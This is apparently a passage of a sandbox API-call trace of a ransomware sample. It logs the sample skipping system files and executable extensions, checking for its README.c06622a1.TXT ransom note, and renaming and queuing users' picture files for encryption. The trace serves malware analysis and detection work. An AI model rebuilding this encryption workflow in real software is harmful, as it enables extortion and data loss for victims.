[0155.726] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.726] wcslen (_String="ldf") returned 0x3 [0155.726] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.726] wcslen (_String="lnk") returned 0x3 [0155.726] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.726] wcslen (_String="mod") returned 0x3 [0155.726] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.726] wcslen (_String="mpa") returned 0x3 [0155.726] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.726] wcslen (_String="msc") returned 0x3 [0155.726] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.726] wcslen (_String="msp") returned 0x3 [0155.726] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.726] wcslen (_String="msstyles") returned 0x8 [0155.726] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.726] wcslen (_String="msu") returned 0x3 [0155.726] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.727] wcslen (_String="nls") returned 0x3 [0155.727] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.727] wcslen (_String="nomedia") returned 0x7 [0155.727] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.727] wcslen (_String="ocx") returned 0x3 [0155.727] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.727] wcslen (_String="prf") returned 0x3 [0155.727] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.727] wcslen (_String="ps1") returned 0x3 [0155.727] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.727] wcslen (_String="rom") returned 0x3 [0155.727] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.727] wcslen (_String="rtp") returned 0x3 [0155.727] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.727] wcslen (_String="scr") returned 0x3 [0155.727] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.727] wcslen (_String="shs") returned 0x3 [0155.727] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.727] wcslen (_String="spl") returned 0x3 [0155.727] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.727] wcslen (_String="sys") returned 0x3 [0155.727] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.727] wcslen (_String="theme") returned 0x5 [0155.727] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.727] wcslen (_String="themepack") returned 0x9 [0155.727] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.727] wcslen (_String="wpx") returned 0x3 [0155.727] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.727] wcslen (_String="lock") returned 0x4 [0155.727] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.727] wcslen (_String="key") returned 0x3 [0155.727] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.728] wcslen (_String="hta") returned 0x3 [0155.728] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.728] wcslen (_String="msi") returned 0x3 [0155.728] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.728] wcslen (_String="pdb") returned 0x3 [0155.728] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.728] wcslen (_String="sql") returned 0x3 [0155.728] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.728] wcslen (_String="sqlite") returned 0x6 [0155.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.728] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.728] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.728] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.728] wcscpy (in: _Dest=0x45000f2, _Source="nRx9q7P7iypouDtP4z P.bmp" | out: _Dest="nRx9q7P7iypouDtP4z P.bmp") returned="nRx9q7P7iypouDtP4z P.bmp" [0155.728] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp", dwFileAttributes=0x80) returned 1 [0155.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\nrx9q7p7iypoudtp4z p.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0155.728] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.729] ReadFile (in: hFile=0x61c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.729] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x633ff987 [0155.729] RtlComputeCrc32 (PartialCrc=0xf987, Buffer=0x3fe8f4, Length=0x80) returned 0xfc30ac9a [0155.729] RtlComputeCrc32 (PartialCrc=0xac9a, Buffer=0x3fe8f4, Length=0x80) returned 0xe96ceddd [0155.729] RtlComputeCrc32 (PartialCrc=0xeddd, Buffer=0x3fe8f4, Length=0x80) returned 0xf346cf32 [0155.729] RtlComputeCrc32 (PartialCrc=0xcf32, Buffer=0x3fe8f4, Length=0x80) returned 0x5809cf91 [0155.729] CloseHandle (hObject=0x61c) returned 1 [0155.729] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.730] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp" [0155.730] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp") returned 0x49 [0155.730] wcscpy (in: _Dest=0x451012a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.730] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\nrx9q7p7iypoudtp4z p.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\nrx9q7p7iypoudtp4z p.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\nRx9q7P7iypouDtP4z P.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\nrx9q7p7iypoudtp4z p.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0155.733] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.733] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b1fc034 [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7cfb77c8 [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x135af25d [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x37410556 [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4894d7f1 [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4354be6c [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfdfc927 [0155.739] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x740ad2c9 [0155.742] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0x9fe33af8 [0155.742] RtlComputeCrc32 (PartialCrc=0x3af8, Buffer=0x4790094, Length=0x80) returned 0x6b951630 [0155.742] RtlComputeCrc32 (PartialCrc=0x1630, Buffer=0x4790094, Length=0x80) returned 0x4c11c6bc [0155.742] RtlComputeCrc32 (PartialCrc=0xc6bc, Buffer=0x4790094, Length=0x80) returned 0xd87ed77 [0155.742] RtlComputeCrc32 (PartialCrc=0xed77, Buffer=0x4790094, Length=0x80) returned 0xbb0f7e5f [0155.742] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0155.742] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.742] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.742] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382c4ba0, ftCreationTime.dwHighDateTime=0x1d5db3e, ftLastAccessTime.dwLowDateTime=0x82ae1340, ftLastAccessTime.dwHighDateTime=0x1d5e041, ftLastWriteTime.dwLowDateTime=0x82ae1340, ftLastWriteTime.dwHighDateTime=0x1d5e041, nFileSizeHigh=0x0, nFileSizeLow=0x9d31, dwReserved0=0x0, dwReserved1=0x0, cFileName="p2Fmv1B44Mx.bmp", cAlternateFileName="P2FMV1~1.BMP")) returned 1 [0155.742] _wcsicmp (_Str1="p2Fmv1B44Mx.bmp", _Str2="README.c06622a1.TXT") returned -2 [0155.742] wcsstr (_Str="p2Fmv1B44Mx.bmp", _SubStr="README") returned 0x0 [0155.742] _wcsicmp (_Str1="autorun.inf", _Str2="p2Fmv1B44Mx.bmp") returned -15 [0155.742] wcslen (_String="autorun.inf") returned 0xb [0155.742] _wcsicmp (_Str1="boot.ini", _Str2="p2Fmv1B44Mx.bmp") returned -14 [0155.743] wcslen (_String="boot.ini") returned 0x8 [0155.743] _wcsicmp (_Str1="bootfont.bin", _Str2="p2Fmv1B44Mx.bmp") returned -14 [0155.743] wcslen (_String="bootfont.bin") returned 0xc [0155.743] _wcsicmp (_Str1="bootsect.bak", _Str2="p2Fmv1B44Mx.bmp") returned -14 [0155.743] wcslen (_String="bootsect.bak") returned 0xc [0155.743] _wcsicmp (_Str1="desktop.ini", _Str2="p2Fmv1B44Mx.bmp") returned -12 [0155.743] wcslen (_String="desktop.ini") returned 0xb [0155.743] _wcsicmp (_Str1="iconcache.db", _Str2="p2Fmv1B44Mx.bmp") returned -7 [0155.743] wcslen (_String="iconcache.db") returned 0xc [0155.743] _wcsicmp (_Str1="ntldr", _Str2="p2Fmv1B44Mx.bmp") returned -2 [0155.743] wcslen (_String="ntldr") returned 0x5 [0155.743] _wcsicmp (_Str1="ntuser.dat", _Str2="p2Fmv1B44Mx.bmp") returned -2 [0155.743] wcslen (_String="ntuser.dat") returned 0xa [0155.743] _wcsicmp (_Str1="ntuser.dat.log", _Str2="p2Fmv1B44Mx.bmp") returned -2 [0155.743] wcslen (_String="ntuser.dat.log") returned 0xe [0155.743] _wcsicmp (_Str1="ntuser.ini", _Str2="p2Fmv1B44Mx.bmp") returned -2 [0155.743] wcslen (_String="ntuser.ini") returned 0xa [0155.743] _wcsicmp (_Str1="thumbs.db", _Str2="p2Fmv1B44Mx.bmp") returned 4 [0155.743] wcslen (_String="thumbs.db") returned 0x9 [0155.743] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.743] wcslen (_String="386") returned 0x3 [0155.743] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.743] wcslen (_String="adv") returned 0x3 [0155.743] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.743] wcslen (_String="ani") returned 0x3 [0155.743] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.743] wcslen (_String="bat") returned 0x3 [0155.743] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.743] wcslen (_String="bin") returned 0x3 [0155.743] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.743] wcslen (_String="cab") returned 0x3 [0155.743] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.743] wcslen (_String="cmd") returned 0x3 [0155.744] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.744] wcslen (_String="com") returned 0x3 [0155.744] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.744] wcslen (_String="cpl") returned 0x3 [0155.744] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.744] wcslen (_String="cur") returned 0x3 [0155.744] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.744] wcslen (_String="deskthemepack") returned 0xd [0155.744] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.744] wcslen (_String="diagcab") returned 0x7 [0155.744] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.744] wcslen (_String="diagcfg") returned 0x7 [0155.744] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.744] wcslen (_String="diagpkg") returned 0x7 [0155.744] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.744] wcslen (_String="dll") returned 0x3 [0155.744] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.744] wcslen (_String="drv") returned 0x3 [0155.744] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.744] wcslen (_String="exe") returned 0x3 [0155.744] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.744] wcslen (_String="hlp") returned 0x3 [0155.744] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.744] wcslen (_String="icl") returned 0x3 [0155.744] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.744] wcslen (_String="icns") returned 0x4 [0155.744] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.744] wcslen (_String="ico") returned 0x3 [0155.744] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.744] wcslen (_String="ics") returned 0x3 [0155.744] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.744] wcslen (_String="idx") returned 0x3 [0155.744] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.744] wcslen (_String="ldf") returned 0x3 [0155.745] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.745] wcslen (_String="lnk") returned 0x3 [0155.745] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.745] wcslen (_String="mod") returned 0x3 [0155.745] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.745] wcslen (_String="mpa") returned 0x3 [0155.745] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.745] wcslen (_String="msc") returned 0x3 [0155.745] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.745] wcslen (_String="msp") returned 0x3 [0155.745] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.745] wcslen (_String="msstyles") returned 0x8 [0155.745] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.745] wcslen (_String="msu") returned 0x3 [0155.745] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.745] wcslen (_String="nls") returned 0x3 [0155.745] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.745] wcslen (_String="nomedia") returned 0x7 [0155.745] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.745] wcslen (_String="ocx") returned 0x3 [0155.745] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.745] wcslen (_String="prf") returned 0x3 [0155.745] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.745] wcslen (_String="ps1") returned 0x3 [0155.745] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.745] wcslen (_String="rom") returned 0x3 [0155.745] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.745] wcslen (_String="rtp") returned 0x3 [0155.745] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.745] wcslen (_String="scr") returned 0x3 [0155.745] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.745] wcslen (_String="shs") returned 0x3 [0155.745] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.745] wcslen (_String="spl") returned 0x3 [0155.746] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.746] wcslen (_String="sys") returned 0x3 [0155.746] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.746] wcslen (_String="theme") returned 0x5 [0155.746] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.746] wcslen (_String="themepack") returned 0x9 [0155.746] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.746] wcslen (_String="wpx") returned 0x3 [0155.746] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.746] wcslen (_String="lock") returned 0x4 [0155.746] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.746] wcslen (_String="key") returned 0x3 [0155.746] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.746] wcslen (_String="hta") returned 0x3 [0155.746] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.746] wcslen (_String="msi") returned 0x3 [0155.746] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.746] wcslen (_String="pdb") returned 0x3 [0155.746] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.746] wcslen (_String="sql") returned 0x3 [0155.746] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.746] wcslen (_String="sqlite") returned 0x6 [0155.746] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.746] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.746] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.746] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.746] wcscpy (in: _Dest=0x45000f2, _Source="p2Fmv1B44Mx.bmp" | out: _Dest="p2Fmv1B44Mx.bmp") returned="p2Fmv1B44Mx.bmp" [0155.746] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp", dwFileAttributes=0x80) returned 1 [0155.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\p2fmv1b44mx.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0155.749] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.749] ReadFile (in: hFile=0x610, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.750] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xecbf87ee [0155.750] RtlComputeCrc32 (PartialCrc=0x87ee, Buffer=0x3fe8f4, Length=0x80) returned 0xf8e35d33 [0155.750] RtlComputeCrc32 (PartialCrc=0x5d33, Buffer=0x3fe8f4, Length=0x80) returned 0x4d1e378 [0155.750] RtlComputeCrc32 (PartialCrc=0xe378, Buffer=0x3fe8f4, Length=0x80) returned 0xde26f1c7 [0155.750] RtlComputeCrc32 (PartialCrc=0xf1c7, Buffer=0x3fe8f4, Length=0x80) returned 0x46f3d416 [0155.750] CloseHandle (hObject=0x610) returned 1 [0155.750] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.750] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp" [0155.750] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp") returned 0x40 [0155.750] wcscpy (in: _Dest=0x4510118, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.750] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\p2fmv1b44mx.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\p2fmv1b44mx.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\p2Fmv1B44Mx.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\p2fmv1b44mx.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0155.753] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.753] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0155.759] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6e5c4a9e [0155.759] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ddd64bd [0155.760] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27676a1a [0155.760] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1145cff0 [0155.760] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x768e0cf6 [0155.760] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a32a93a [0155.760] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa65f5d4 [0155.760] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c0e91cf [0155.763] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0x911ea210 [0155.763] RtlComputeCrc32 (PartialCrc=0xa210, Buffer=0x4820094, Length=0x80) returned 0x33c8d3fb [0155.763] RtlComputeCrc32 (PartialCrc=0xd3fb, Buffer=0x4820094, Length=0x80) returned 0xccc42c55 [0155.763] RtlComputeCrc32 (PartialCrc=0x2c55, Buffer=0x4820094, Length=0x80) returned 0x34c7e4ad [0155.763] RtlComputeCrc32 (PartialCrc=0xe4ad, Buffer=0x4820094, Length=0x80) returned 0xac73aa2 [0155.763] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0155.763] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.763] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.763] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bf35880, ftCreationTime.dwHighDateTime=0x1d5e67e, ftLastAccessTime.dwLowDateTime=0x35c03fc0, ftLastAccessTime.dwHighDateTime=0x1d5d8f0, ftLastWriteTime.dwLowDateTime=0x35c03fc0, ftLastWriteTime.dwHighDateTime=0x1d5d8f0, nFileSizeHigh=0x0, nFileSizeLow=0x17104, dwReserved0=0x0, dwReserved1=0x0, cFileName="pZxmQYYyFLjb.png", cAlternateFileName="PZXMQY~1.PNG")) returned 1 [0155.763] _wcsicmp (_Str1="pZxmQYYyFLjb.png", _Str2="README.c06622a1.TXT") returned -2 [0155.763] wcsstr (_Str="pZxmQYYyFLjb.png", _SubStr="README") returned 0x0 [0155.763] _wcsicmp (_Str1="autorun.inf", _Str2="pZxmQYYyFLjb.png") returned -15 [0155.763] wcslen (_String="autorun.inf") returned 0xb [0155.763] _wcsicmp (_Str1="boot.ini", _Str2="pZxmQYYyFLjb.png") returned -14 [0155.763] wcslen (_String="boot.ini") returned 0x8 [0155.763] _wcsicmp (_Str1="bootfont.bin", _Str2="pZxmQYYyFLjb.png") returned -14 [0155.763] wcslen (_String="bootfont.bin") returned 0xc [0155.763] _wcsicmp (_Str1="bootsect.bak", _Str2="pZxmQYYyFLjb.png") returned -14 [0155.763] wcslen (_String="bootsect.bak") returned 0xc [0155.763] _wcsicmp (_Str1="desktop.ini", _Str2="pZxmQYYyFLjb.png") returned -12 [0155.763] wcslen (_String="desktop.ini") returned 0xb [0155.763] _wcsicmp (_Str1="iconcache.db", _Str2="pZxmQYYyFLjb.png") returned -7 [0155.763] wcslen (_String="iconcache.db") returned 0xc [0155.763] _wcsicmp (_Str1="ntldr", _Str2="pZxmQYYyFLjb.png") returned -2 [0155.763] wcslen (_String="ntldr") returned 0x5 [0155.764] _wcsicmp (_Str1="ntuser.dat", _Str2="pZxmQYYyFLjb.png") returned -2 [0155.764] wcslen (_String="ntuser.dat") returned 0xa [0155.764] _wcsicmp (_Str1="ntuser.dat.log", _Str2="pZxmQYYyFLjb.png") returned -2 [0155.764] wcslen (_String="ntuser.dat.log") returned 0xe [0155.764] _wcsicmp (_Str1="ntuser.ini", _Str2="pZxmQYYyFLjb.png") returned -2 [0155.764] wcslen (_String="ntuser.ini") returned 0xa [0155.764] _wcsicmp (_Str1="thumbs.db", _Str2="pZxmQYYyFLjb.png") returned 4 [0155.764] wcslen (_String="thumbs.db") returned 0x9 [0155.764] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.764] wcslen (_String="386") returned 0x3 [0155.764] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.764] wcslen (_String="adv") returned 0x3 [0155.764] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.764] wcslen (_String="ani") returned 0x3 [0155.764] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.764] wcslen (_String="bat") returned 0x3 [0155.764] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.764] wcslen (_String="bin") returned 0x3 [0155.764] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.764] wcslen (_String="cab") returned 0x3 